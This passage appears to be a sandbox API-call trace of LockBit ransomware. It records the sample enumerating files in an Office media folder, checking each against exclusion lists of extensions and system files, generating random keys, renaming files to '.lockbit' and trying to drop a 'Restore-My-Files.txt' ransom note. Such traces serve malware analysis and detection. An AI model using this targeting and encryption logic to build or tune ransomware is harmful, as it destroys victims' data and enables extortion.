cAlternateFileName="")) returned 1 [0199.077] lstrcmpiW (lpString1=".", lpString2="J0297749.WMF") returned -1 [0199.077] lstrcmpiW (lpString1="..", lpString2="J0297749.WMF") returned -1 [0199.077] PathFindExtensionW (pszPath="J0297749.WMF") returned=".WMF" [0199.077] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.077] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.078] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.078] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0297749.WMF") returned 1 [0199.078] lstrcmpiW (lpString1="ntldr", lpString2="J0297749.WMF") returned 1 [0199.078] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0297749.WMF") returned 1 [0199.078] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0297749.WMF") returned -1 [0199.078] lstrcmpiW (lpString1="autorun.inf", lpString2="J0297749.WMF") returned -1 [0199.078] lstrcmpiW (lpString1="thumbs.db", lpString2="J0297749.WMF") returned 1 [0199.079] lstrcmpiW (lpString1="iconcache.db", lpString2="J0297749.WMF") returned -1 [0199.079] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.079] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297749.WMF") returned=".WMF" [0199.079] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.079] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.079] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.079] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297749.WMF.lockbit") returned 70 [0199.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297749.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0297749.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.081] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.081] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.081] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10170) returned 1 [0199.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.081] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.082] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.148] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297749.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297749.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.148] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.148] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.226] free (_Block=0x1fa2ed8) [0199.226] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0297749.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.226] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.226] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.226] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3dea00, ftCreationTime.dwHighDateTime=0x1bf2c8c, ftLastAccessTime.dwLowDateTime=0xbd669c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xae3dea00, ftLastWriteTime.dwHighDateTime=0x1bf2c8c, nFileSizeHigh=0x0, nFileSizeLow=0x197e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0298653.WMF", cAlternateFileName="")) returned 1 [0199.226] lstrcmpiW (lpString1=".", lpString2="J0298653.WMF") returned -1 [0199.226] lstrcmpiW (lpString1="..", lpString2="J0298653.WMF") returned -1 [0199.226] PathFindExtensionW (pszPath="J0298653.WMF") returned=".WMF" [0199.226] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.226] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.227] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.227] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0298653.WMF") returned 1 [0199.228] lstrcmpiW (lpString1="ntldr", lpString2="J0298653.WMF") returned 1 [0199.228] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0298653.WMF") returned 1 [0199.228] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0298653.WMF") returned -1 [0199.228] lstrcmpiW (lpString1="autorun.inf", lpString2="J0298653.WMF") returned -1 [0199.228] lstrcmpiW (lpString1="thumbs.db", lpString2="J0298653.WMF") returned 1 [0199.228] lstrcmpiW (lpString1="iconcache.db", lpString2="J0298653.WMF") returned -1 [0199.228] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.228] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298653.WMF") returned=".WMF" [0199.228] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.228] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.228] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.229] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.229] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298653.WMF.lockbit") returned 70 [0199.229] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298653.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0298653.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.230] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.230] malloc (_Size=0x40068) returned 0x3df0008 [0199.231] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6526) returned 1 [0199.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.231] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.235] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298653.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298653.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.235] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.235] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.237] free (_Block=0x1fa2ed8) [0199.237] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298653.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.237] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.237] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.237] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dcbb900, ftCreationTime.dwHighDateTime=0x1bf2c8d, ftLastAccessTime.dwLowDateTime=0xbd669c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2dcbb900, ftLastWriteTime.dwHighDateTime=0x1bf2c8d, nFileSizeHigh=0x0, nFileSizeLow=0x19a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0298897.WMF", cAlternateFileName="")) returned 1 [0199.237] lstrcmpiW (lpString1=".", lpString2="J0298897.WMF") returned -1 [0199.237] lstrcmpiW (lpString1="..", lpString2="J0298897.WMF") returned -1 [0199.237] PathFindExtensionW (pszPath="J0298897.WMF") returned=".WMF" [0199.237] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.237] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.238] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.238] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0298897.WMF") returned 1 [0199.239] lstrcmpiW (lpString1="ntldr", lpString2="J0298897.WMF") returned 1 [0199.239] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0298897.WMF") returned 1 [0199.239] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0298897.WMF") returned -1 [0199.239] lstrcmpiW (lpString1="autorun.inf", lpString2="J0298897.WMF") returned -1 [0199.239] lstrcmpiW (lpString1="thumbs.db", lpString2="J0298897.WMF") returned 1 [0199.239] lstrcmpiW (lpString1="iconcache.db", lpString2="J0298897.WMF") returned -1 [0199.239] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.239] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298897.WMF") returned=".WMF" [0199.239] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.239] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.239] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW 